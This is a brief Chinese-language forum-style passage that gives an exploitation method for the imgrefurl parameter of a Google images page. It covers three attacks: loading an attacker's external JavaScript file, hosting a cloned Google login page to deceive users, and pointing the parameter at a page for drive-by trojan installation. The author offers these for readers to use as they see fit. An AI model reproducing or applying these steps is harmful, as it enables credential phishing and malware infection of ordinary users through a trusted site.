利用方法:
一, 我们将imgrefurl值改为imgrefurl=http://hi.baidu.com/menzhi007/1.js
1.js 内容可以构造我们的攻击语句 alert(/menzhi007/);
二, 将google登陆https://www.google.com/accounts/Login?continue=http://www.google.cn/webhp%
3Fsource%3Dg_cn&hl=zh-CN另存为login.html 放到我们的链接里, 将imgrefurl值改
imgrefurl=http://hi.baidu.com/menzhi007/login.html即欺骗地址(欺骗对象:幼儿园学生, 应该不会
有人上钩, 请求大牛指教利用方法)
三, 或者我们直接将imgrefurl值改为imgrefurl=http://hi.baidu.com/menzhi007/mm.htm 挂马吧, 适合
大家自己去利用吧, 呵呵, 自己玩玩就可以了, 至于用于什么用途, 我只能看你的道德了, 看你自己吧。
